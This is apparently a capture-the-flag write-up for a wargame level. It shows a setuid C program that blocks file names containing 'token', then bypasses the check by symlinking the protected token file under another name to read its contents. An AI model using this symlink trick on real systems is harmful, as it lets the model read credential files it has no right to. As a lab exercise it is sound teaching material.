In Level04 we are given the code of a program owned by flag04 user:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)  
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);
    exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

The program opens a file passed as first argument if the name does not contain the token string so we cannot use it to open our target token file ... or can we?
Turns out that solving the level was as easy as creating symlink with a different name:

[email protected]:~$ /home/flag04/flag04 /home/flag04/token  
You may not access '/home/flag04/token'  
[email protected]:~$ ln -s /home/flag04/token nekot  
[email protected]:~$ /home/flag04/flag04 nekot  
06508b5e-8909-4f38-b630-fdb148a848a2